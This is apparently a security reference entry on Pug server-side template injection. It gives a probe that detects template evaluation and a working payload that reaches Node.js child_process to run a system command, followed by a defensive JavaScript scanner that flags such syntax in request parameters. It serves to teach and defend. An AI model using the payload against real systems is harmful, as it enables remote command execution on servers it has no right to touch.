Discovery
Pug is a Node.js template engine, so a server that renders Pug templates runs Node.js in the back-end.
Pug code example:
html
  head
    title Greetings, #{userName}
  body
    h1 Greetings, #{userName}
    input(type='hidden' name='userType' value='guest')
    if showGreetings
      - const greetings = ['Hello', 'Hi', 'Welcome']
      p The greetings are:
      each greeting in greetings
        p= greeting
    else
      p No greetings for you!
Input
#{"7"*7}
Output
<49>
Exploitation
- var require = global.process.mainModule.require
= require('child_process').spawnSync('whoami').stdout
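For the defending side, the probe and payload shapes shown above can be flagged in request parameters before they reach a template. This is an added example, not code from the original page; the function names, rule names and sample values are assumptions constructed for illustration.

```javascript
// Added example: flag request parameter values that carry Pug template syntax.
// Rule names and sample inputs are constructed for illustration (heuristic rules).
const RULES = [
  // #{...} or !{...}: escaped / unescaped interpolation, as in the discovery probe
  { name: 'interpolation', re: /[#!]\{[^}]*\}/ },
  // a line starting with "-" (unbuffered code) or "=" / "!=" (buffered code)
  { name: 'inline-code', re: /^[ \t]*(?:-|!?=)[ \t]+[A-Za-z_$]/m },
  // Node.js internals referenced by the exploitation payload on this page
  { name: 'node-internals', re: /\b(?:mainModule|child_process|global\.process)\b/ },
];

// Decode repeatedly (bounded) so double URL-encoding does not hide the markers.
function normalise(value) {
  let out = String(value);
  for (let i = 0; i < 3; i++) {
    let next;
    try {
      next = decodeURIComponent(out.replace(/\+/g, ' '));
    } catch {
      break; // malformed percent-encoding: keep what we have
    }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Returns the names of every rule the value matches (empty array = clean).
function scanForPugSyntax(value) {
  const text = normalise(value);
  return RULES.filter((r) => r.re.test(text)).map((r) => r.name);
}

// Constructed sample parameter values: benign, raw probe, URL-encoded probe.
const SAMPLES = ['Alice', '#{"7"*7}', '%23%7B%227%22*7%7D', '100% sure'];

for (const s of SAMPLES) {
  const hits = scanForPugSyntax(s);
  console.log(JSON.stringify(s), '->', hits.length ? hits.join(', ') : 'clean');
}
```

A hit is a triage signal, not proof of a vulnerable sink: the underlying fix is to pass user input to the template as data (locals) rather than compiling it as template source.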